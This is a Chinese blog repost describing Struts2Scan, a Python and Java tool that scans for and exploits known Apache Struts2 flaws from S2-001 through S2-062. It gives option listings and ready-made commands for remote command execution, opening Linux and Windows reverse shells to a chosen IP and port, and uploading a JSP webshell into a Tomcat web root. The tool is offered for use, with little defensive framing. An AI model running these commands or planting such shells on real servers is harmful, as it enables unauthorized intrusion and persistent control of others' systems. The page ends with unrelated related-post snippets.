struts2综合漏洞扫描工具

struts2综合漏洞扫描工具python扫描工具更新2022-4-161.添加了S2-062漏洞利用其实是对S2-061漏洞的绕过支持命令执行,Linux反弹shell,windows反弹shell。2.解决了了Windows反弹shell的功能底层原理:解决了有效负载Runtime.getRuntime().exec()执行复杂windows命令不成功的问题。详情文章:https://www.yuque.com/docs/share/0abe4b7e-45fd-4902-a23a-ad51ab72cbb9?#《使用j

大家好,又见面了,我是你们的朋友全栈君。

python扫描工具更新2022-4-16

1.添加了S2-062漏洞利用
其实是对S2-061漏洞的绕过
支持命令执行,Linux反弹shell,windows反弹shell。
2.解决了了Windows反弹shell的功能
底层原理:解决了有效负载Runtime.getRuntime().exec()执行复杂windows命令
不成功的问题。
详情文章:https://www.yuque.com/docs/share/0abe4b7e-45fd-4902-a23a-ad51ab72cbb9?# 《使用java命令执行函数反弹windows-shell》

工具地址https://github.com/Vancomycin-g/Struts2Scan/
里面有两个工具,一个是python编写的工具,另一个是jar文件
python工具是改变大佬的。jar文件是在网络上找的。

java工具

优点

1.扫描比较稳定
2.误报情况少,
3.可视化,方便操作

缺点

1.无法指定payload进行利用
2.无法反弹shell
3.无S2-061 payload

用法

直接一键扫描就行了,简单粗暴

python工具

优点

1.大多payload支持Linux反弹shell,少部分payload支持windows反弹shell
2.可以自己选可以使用的payload.
3.有S2-061 payload

缺点

1.稳定性优化的还可以,可能存在误报情况,
2.有许多命令参数。

工具介绍

原作者:github地址:https://github.com/HatBoy/Struts2-Scan
感谢原作者开源的工具
此次是在原有的基础上进行升级,优化。
升级内容:

1.添加了S2-061漏洞
2.优化了误报情况。
3.个别添加了windows反弹shell功能。
4.原来参数-r ip:port修改成了,
-lr ip:port 反弹Linuxshell
-wr ip:port反弹Windows shell
5.还有其他细微的地方

Struts2-Scan

  • Struts2漏洞利用扫描工具,基于互联网上已经公开的Structs2高危漏洞exp的扫描利用工具,目前支持的漏洞如下: S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019, S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-048, S2-052, S2-053, S2-devMode, S2-057,S2-061,S2-062
  • 支持单个URL漏洞检测和批量URL检测,指定漏洞利用,可获取WEB路径,执行命令,反弹shell和上传文件,注意,并不是所有的漏洞均支持上述功能,只有部分功能支持

运行环境

工具参数说明

Usage: Struts2Scan.py [OPTIONS]

  Struts2批量扫描利用工具

Options:
  -i, --info          漏洞信息介绍
  -v, --version       显示工具版本
  -u, --url TEXT      URL地址
  -n, --name TEXT     指定漏洞名称, 漏洞名称详见info
  -f, --file TEXT     批量扫描URL文件, 一行一个URL
  -d, --data TEXT     POST参数, 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp}
  -c, --encode TEXT   页面编码, 默认UTF-8编码
  -p, --proxy TEXT    HTTP代理. 格式为http://ip:port
  -t, --timeout TEXT  HTTP超时时间, 默认10s
  -w, --workers TEXT  批量扫描进程数, 默认为10个进程
  --header TEXT       HTTP请求头, 格式为: key1=value1&key2=value2
  -e, --exec          进入命令执行shell
  --webpath           获取WEB路径
  -lr, --Linux_reverse TEXT  反弹Linux shell地址, 格式为ip:port
  -wr, --Win_reverse TEXT  反弹Windows shell地址, 格式为ip:port
  --upfile TEXT       需要上传的文件路径和名称
  --uppath TEXT       上传的目录和名称, 如: /usr/local/tomcat/webapps/ROOT/shell.jsp
  -q, --quiet         关闭打印不存在漏洞的输出,只保留存在漏洞的输出
  -h, --help          Show this message and exit.

使用例子

查看漏洞详细信息:

$ python3 Struts2Scan.py --info

单个URL漏洞检测:

$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action

批量漏洞检测:

$ python3 Struts2Scan.py -f urls.txt

指定POST数据:

$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -d name=admin&email=admin&age={exp}

常用方法

# 命令执行
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016  -e



# 反弹Linux shell
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 -lr 192.168.100.8:8888


# 反弹Windows shell
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 -wr 192.168.100.8:8888

# 上传shell
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --upfile shell.jsp --uppath /usr/local/tomcat/webapps/ROOT/shell.jsp


版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/161733.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 什么是tomcat类加载机制_理解分析类面试题

    什么是tomcat类加载机制_理解分析类面试题Tomcat的类加载机制是违反了双亲委托原则的,对于一些未加载的非基础类(Object,String等),各个web应用自己的类加载器(WebAppClassLoader)会优先加载,加载不到时再交给

    2022年8月6日
    11
  • 数据库建模

    1)定义:在设计数据库时,对现实世界进行分析、抽象、并从中找出内在联系,进而确定数据库的结构,这一过程就称为数据库建模。2)作用:1.模型能准确表达设计意图,更易于进行技术交流。2.模型可以用来高效地生产代码、脚本、技术文档,可以做到“一处改动,多处同步”的效果。3.模型驱动的开发能使开发过程保持一致性,提高开发人员的效率,而且能保持我们的设计模型能被准确的实现而不产生歪曲。

    2022年4月8日
    196
  • 基于伯努利原理的速度监测芯片可用于天然气管道泄露检测

    基于伯努利原理的速度监测芯片可用于天然气管道泄露检测基于伯努利原理的速度监测芯片跟杭州迈煌科技用光纤水听器侦听传感技术类似,可用于天然气管道泄露检测。安装操作简单,可在不破坏现有管道下安装,工程易实现。

    2022年6月17日
    35
  • 怎么反编译dll文件(反编译dll查看源代码)

    DLL(DynamicLinkLibrary)文件为动态链接库文件,又称“应用程序拓展”,是软件文件类型。下载并解压.NETReflector,下面下载为绿色7.3.0.18版本;(注:此为英文版,百度有汉化版下载)链接:https://pan.baidu.com/s/1eoWFe62wA_uOdn3wTQ7e-w密码:gt87…

    2022年4月12日
    102
  • JMH微基准测试入门案例

    JMH微基准测试入门案例JMH-javaMicrobenchmarkHarness微基准测试,他是测试某个方法的性能到底是好还是不好。这个测试框架是2013年发出来的,有JLT开发人员开发,后来归到OpenJDK下面。官网:http://openjdk.java.net/projects/code-tools/jmh/下面介绍什么是JMH,他是用来干什么的,怎么使用?基于idea中使用。创建…

    2022年7月11日
    21
  • 20190202 学习「建议收藏」

    20190202 学习「建议收藏」20190202 学习

    2022年4月21日
    38

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号